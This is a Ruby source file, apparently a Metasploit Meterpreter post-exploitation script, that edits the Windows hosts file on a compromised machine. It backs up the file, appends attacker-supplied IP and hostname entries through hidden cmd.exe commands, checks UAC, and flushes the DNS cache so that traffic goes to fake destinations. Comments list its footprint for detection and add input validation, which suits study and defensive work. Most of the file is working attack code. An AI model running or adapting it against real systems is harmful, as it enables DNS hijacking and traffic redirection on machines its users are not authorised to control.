Path: blob/master/scripts/meterpreter/hostsedit.rb
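##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##

# Meterpreter script for modifying the hosts file in Windows,
# given a single entry or several in a file, and clearing the
# DNS cache on the target machine.
# This script works with Windows 2000, Windows XP, Windows 2003,
# Windows Vista and Windows 2008.
# Provided: carlos_perez[at]darkoperator[dot]com
# Version: 0.1.0
# Note: in Vista UAC must be disabled to be able to perform hosts
# file modifications.
#
# Footprint left on the target, as visible in the code below (useful for
# detection and for restoring the file afterwards):
#   * a hidden `cmd /c echo ... >> <hosts>` that appends to
#     %SYSTEMROOT%\System32\drivers\etc\hosts
#   * a copy of the original file named hosts<5 digits>.back beside it
#   * `ipconfig /flushdns`
# File-integrity monitoring on the hosts file and process-creation logging
# for cmd.exe / ipconfig.exe can surface each of these.

################## Variable Declarations ##################
session = client

# Setting Arguments
# Held in a class variable because the `def`-defined usage helper below reads it.
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help Options." ],
  "-e" => [ true, "Host entry in the format of IP,Hostname." ],
  "-l" => [ true, "Text file with list of entries in the format of IP,Hostname. One per line." ]
)

# Print the help text and stop the script by raising Rex::Script::Completed.
def usage
  print_line("This Meterpreter script is for adding entries in to the Windows Hosts file.")
  print_line("Since Windows will check first the Hosts file instead of the configured DNS Server")
  print_line("it will assist in diverting traffic to the fake entry or entries. Either a single")
  print_line("entry can be provided or a series of entries provided a file with one per line.")
  print_line(@@exec_opts.usage)
  print_line("Example:\n\n")
  print_line("run hostsedit -e 127.0.0.1,google.com\n")
  print_line("run hostsedit -l /tmp/fakednsentries.txt\n\n")
  raise Rex::Script::Completed
end

# Set path to the hosts file
hosts = session.sys.config.getenv('SYSTEMROOT') + "\\System32\\drivers\\etc\\hosts"

# Check whether UAC is enabled on the target.
#
# Only runs the registry check when sysinfo reports "Windows 7" or "Vista";
# on any other OS string it returns nil without touching the registry.
# Raises a RuntimeError when EnableLUA is 1, returns false when it is not.
def checkuac(session)
  winver = session.sys.config.sysinfo
  return unless winver["OS"] =~ /Windows 7|Vista/

  print_status("Checking if UAC is enabled.")
  open_key = session.sys.registry.open_key(
    HKEY_LOCAL_MACHINE,
    "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
    KEY_READ
  )
  begin
    value = open_key.query_value("EnableLUA").data
  ensure
    # Release the remote registry handle even if the query raises.
    open_key.close
  end

  if value == 1
    print_status("\tUAC is enabled")
    raise "Unable to continue UAC is enabled."
  end

  print_status("\tUAC is disabled")
  false
end

# Return true when +ip+ and +host+ consist only of characters that can appear
# in an IP literal / host name.
#
# This is a character allow-list, not a full address parser. Its purpose is to
# keep cmd.exe metacharacters (&, |, <, >, ^, %, quotes, whitespace) out of the
# command line that add2hosts builds by string interpolation, so that a
# malformed line in an entries file cannot run anything other than the
# intended `echo`.
def valid_hosts_entry?(ip, host)
  return false unless ip.to_s =~ /\A[0-9A-Fa-f:.]+\z/
  return false unless host.to_s =~ /\A[A-Za-z0-9._-]+\z/
  true
end

# Append one "IP,Hostname" record to the hosts file on the target.
#
# Entries that do not split into exactly an IP part and a host part, or that
# contain characters outside the allow-list, are reported and skipped
# (returns false) instead of being interpolated into the command line.
def add2hosts(session, record, hosts)
  ip, host = record.to_s.split(",", 2).map { |part| part.strip }
  unless valid_hosts_entry?(ip, host)
    print_error("Skipping malformed entry #{record.inspect}; expected IP,Hostname")
    return false
  end

  print_status("Adding Record for Host #{host} with IP #{ip}")
  session.sys.process.execute("cmd /c echo #{ip}\t#{host} >> #{hosts}", nil, {'Hidden' => true})
end

# Make a backup of the hosts file on the target.
# The copy is written next to the original as hosts<5 random digits>.back.
def backuphosts(session, hosts)
  random = sprintf("%.5d", rand(100000))
  backup = "#{hosts}#{random}.back"
  print_status("Making Backup of the hosts file.")
  session.sys.process.execute("cmd /c copy #{hosts} #{backup}", nil, {'Hidden' => true})
  print_status("Backup located in #{backup}")
end

# Clear DNS cached entries on the target.
def cleardnscach(session)
  print_status("Clearing the DNS Cache")
  session.sys.process.execute("cmd /c ipconfig /flushdns", nil, {'Hidden' => true})
end

if client.platform == 'windows'
  @@exec_opts.parse(args) { |opt, idx, val|
    case opt
    when "-e"
      checkuac(session)
      backuphosts(session, hosts)
      add2hosts(session, val, hosts)
      cleardnscach(session)
    when "-l"
      checkuac(session)
      raise "File #{val} does not exist!" unless ::File.exist?(val)

      backuphosts(session, hosts)
      # File.foreach closes the local entries file when iteration ends;
      # the previous File.open(...).each_line left the handle open.
      ::File.foreach(val) do |line|
        next if line.strip.length < 1
        next if line[0, 1] == "#"
        add2hosts(session, line.chomp, hosts)
      end
      cleardnscach(session)
    when "-h"
      usage
    end
  }
  usage if args.length == 0
else
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end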